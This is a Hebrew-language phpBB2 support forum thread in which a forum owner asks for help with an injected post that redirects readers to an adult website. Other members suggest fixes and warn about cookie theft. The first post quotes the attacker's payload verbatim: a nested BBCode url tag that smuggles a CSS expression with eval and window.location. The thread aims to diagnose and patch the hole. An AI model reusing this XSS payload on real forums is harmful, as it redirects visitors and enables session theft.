פרצת אבטחה אצלי בפורום PHPBB

פורום התמיכה לגרסה phpBB2. שימו לב - פורום זה הינו פורום ארכיון. התמיכה במערכת phpBB2 הופסקה.

מנהל: צוות האתר

eyal20
משתמש חדש
משתמש חדש
הודעות: 5
הצטרף: 08/08/2007 ב-19:38:23

פרצת אבטחה אצלי בפורום PHPBB

הודעה שלא נקראהעל ידי eyal20 » 05/12/2007 ב-21:54:24

הקוד הזה מקפיץ את הצופה בהודעה לאתר 'http://www.sexlist.co.il'
איזה עדכון אני צריך?
הגרסה שמותקנת אצלי היא 1.0.14

[url]www.[url=www.s=''style='top:expression(eval(this.sss));'sss=`window.location('http://www.sexlist.co.il');this.sss=null`s='][/url][/url]'

אודה למי שיכול לעזור כי זה קצת דחוף :?

ayalx
משתמש חדש
משתמש חדש
הודעות: 72
הצטרף: 26/05/2005 ב-15:35:52

הודעה שלא נקראהעל ידי ayalx » 06/12/2007 ב-11:11:32

כנס ללוח הבקרה > הגדרות הפורום.
חפש את האופצייה "אפשר HTML".
שנה אותה ללא ושמור את ההגדרות.
זה אמור לפתור את הבעיה.

eyal20
משתמש חדש
משתמש חדש
הודעות: 5
הצטרף: 08/08/2007 ב-19:38:23

הודעה שלא נקראהעל ידי eyal20 » 06/12/2007 ב-12:43:44

אני לא מאפשר HTML בפורום
זה משהו קצת יותר מתוחכם :?

סמל אישי של המשתמש
yoyob
משתמש עם עתיד
משתמש עם עתיד
הודעות: 488
הצטרף: 05/12/2006 ב-14:53:18
יצירת קשר:

הודעה שלא נקראהעל ידי yoyob » 07/12/2007 ב-12:50:29

חפש ב-phpbb.com (העולמי) או בדיונים בפורום.
בעבר סיפקתי קישור לגבי מוד אשר מאפשר רק למשתמשים בעלי מספר הודעות וותק מסויים להזין קישורים בהודעות.
אגב זה לא מדויק להגדיר redirect כפרצת אבטחה.

ayalx
משתמש חדש
משתמש חדש
הודעות: 72
הצטרף: 26/05/2005 ב-15:35:52

הודעה שלא נקראהעל ידי ayalx » 07/12/2007 ב-14:20:19

http://www.phpbb.co.il/viewtopic.php?t=5723
בצע את שינויי הקוד שמוסברים כאן, זה אמור לסתום את פרתצ האבטחה של הפורום שלך.
כדאי שתעשה את זה מהר ככל האפשר - בעזרת פרצת האבטחה הזו ניתן לגנוב את העוגיות שלך ולהתחבר במקומך.
אם שוגרת לדף חשוד כלשהו בעזרת הפרצה הזו, תחליף מהר סיסמא.


חזור אל “תמיכה - ארכיון”

מי מחובר

משתמשים הגולשים בפורום זה: Bing [Bot] ו־ 141 אורחים

cron